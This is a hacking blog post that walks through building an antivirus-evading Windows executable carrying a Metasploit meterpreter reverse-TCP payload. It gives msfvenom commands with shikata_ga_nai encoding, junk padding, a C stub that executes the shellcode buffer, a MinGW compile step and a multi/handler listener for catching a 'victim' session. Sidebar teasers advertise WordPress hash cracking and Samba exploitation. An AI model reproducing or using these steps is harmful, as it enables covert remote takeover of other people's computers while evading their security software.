generate custom shellcode executable

-
Hay guys, today I'm back again to give a discussion of exploitation.
planning that I have made is to start making a payload with language *. c then insert shellcode payload and create layers in order to avoid antivirus and then compile it into an executable file.

Equipments :
1. Metasploit
2. Mingw32

My first step to create a layer for the shellcode by exploiting the scripts files iceweasel.
# cat /usr/bin/iceweasel | tr -dc CHAR1-CHAR2 | head -c1200 > Desktop/PAYLOAD/padding.txt

cat /usr/bin/iceweasel = to display the script file iceweasel
tr -dc CHAR1-CHAR2 = Translate / squeeze, characters from standard input,writing to standard output.
head -c1200 = change the size of your random padding
Desktop/PAYLOAD/padding.txt = files saving in the directory Desktop/payload/ by name padding.txt

and the result is like this:
Now, I make a payload using msfvenom with shikata_ga_nai encoding and save it with the extension *. c and store it in the directory Desktop/payload/ by name payload.c
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 EXITFUNC=thread -a x86 -b '\xff' -e x86/shikata_ga_nai -f c > ~/Desktop/PAYLOAD/payload.c

LHOST/LPORT = adjust the IP-Address and Port-Address that you use.
and this is the result of the payload.c:

The next, edit payload.c file so it looks like this:
The next, move Padding.txt file that we created above into payload.c and add the command:
unsigned char padding[] =

 unsigned char payload[] =

 int main(void) { ((void (*)())payload)();}

So file payload.c looks just as follows:

I hope that here we do not have a problem =)
Next, file payload.c compile using MingW32, untuk instalasi MingW32 please type the following command:
# apt-get install mingw32

If already installed then immediately we compile the file payload.c:
# i586-mingw32msvc-gcc Desktop/PAYLOAD/payload.c -o Desktop/PAYLOAD/payload.exe
I put the output in the same directory with the name payload.exe:

The next, run of multi handler to listen to the victim's computer:
# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 EXITFUNC=thread E

Now, we see the victim:
Above shows the file to execute when the victim does not happen on the victim's computer, but we look back to the console on the handler that we run.


we managed to get a first meterpreter session =))


regards by:
Hidemichi-Hiroyuki a.k.a [H2]

Comments

Post a Comment

Do Not Fuckin Spamming

Popular posts from this blog

Decrypt MD5 $Wordpress

-
Image
Hy, I'm back again. I will discuss how to Decrypt a password in the form the MD5 hash wordpress. here are some examples of hash md5 encryption wordpress will we Decrypt: HASH                                                                                  PASS $P$BDHjLCEroc8ujkcs8RZxOhcE80aV5h.           : th3sweety0ne  $P$BPXNfl3mZiO7PZc4XZqFFjX7TyP7Lh.           : Pabl0-saChez $P$BqilSln8PD9SBFuTx8KkaXz62aIIvV/             : m4rim4r123 $P$BnfObieGq5ygdt0OMgwbnKvFt8EFUs.          : Gh0stTrac3 $P$B.RwpJQV8ANOyl19RGHhCaYYgJyvQM1  : *12345*0a0b0c0d many of my friends are overwhelmed when decrypt wordpress md5 hash. so are they wasting their jobs because they could not solve this one password. Equipments: 1. Hashcat             ==> Decrypt Hash 2.  Rockyou.txt       ==> Wordlists 3. Hash-Identifier   ==> to see hash mode Here I use the Operating System Kali Linux. First Step : we see the  kind of hash we will Decrypt. to facilitate us in decryption
Read more

Exploit Samba "SmbClient"

-
Image
Such as FTP (File Transfer Protocol) samba include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on. in this case we have to get the victim to allow shared folders or files. Equipments : 1. SmbClient 2. Nmap 3. Metasploit The firstStep. scanning port the victim's ip-address using Nmap. in here that we need right port is port   445  microsoft-ds. # Nmap (Victim Ip-Address) seen in the picture above. I am lucky :) now, let us look the contents of the port # nmap -p445 --script=smb-os-discovery (Victim Ip-Address) --script=smb-os-discovery : Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139) . seen in the picture above, it turns out the victim we use Operating System Windows 7 Ultimate.  Computer Name And NetBIOS Name is a ANONYMOUS-PC. now,
Read more

Configure Pure-FTP on Kali Linux

-
Image
FTP or file transfer protocol is a protocol that allows you to transfer files to and from a remote machine. BackTrack has pure-FTPd installed by default. FTP operates on port 21. Contents : 1. Installasion 2. Configuration 3. Run Installation Pure-Ftpd # apt-get install pure-ftpd Installation Success =)) Configure Ftpd add new group: # groupadd ftpgroup add user: # useradd -g ftpgroup -d /dev/null -s /etc ftpuser -g =  name or ID of the primary group of the new account -d = home directory of the new account -s = login shell of the new account configure store a list of users: # pure-pw useradd myftp -u ftpuser -d /home/ftp/pub/myftp myftp = your ftp username please enter you password. configure puredb database file # pure-pw mkdb The next entry to the directory /etc/pure-ftpd/auth/ # cd /etc/pure-ftpd/auth then Create hard links by default: # ln -s ../conf/PureDB 60pdb then, make a directory /ftp # mkdir /home/ft
Read more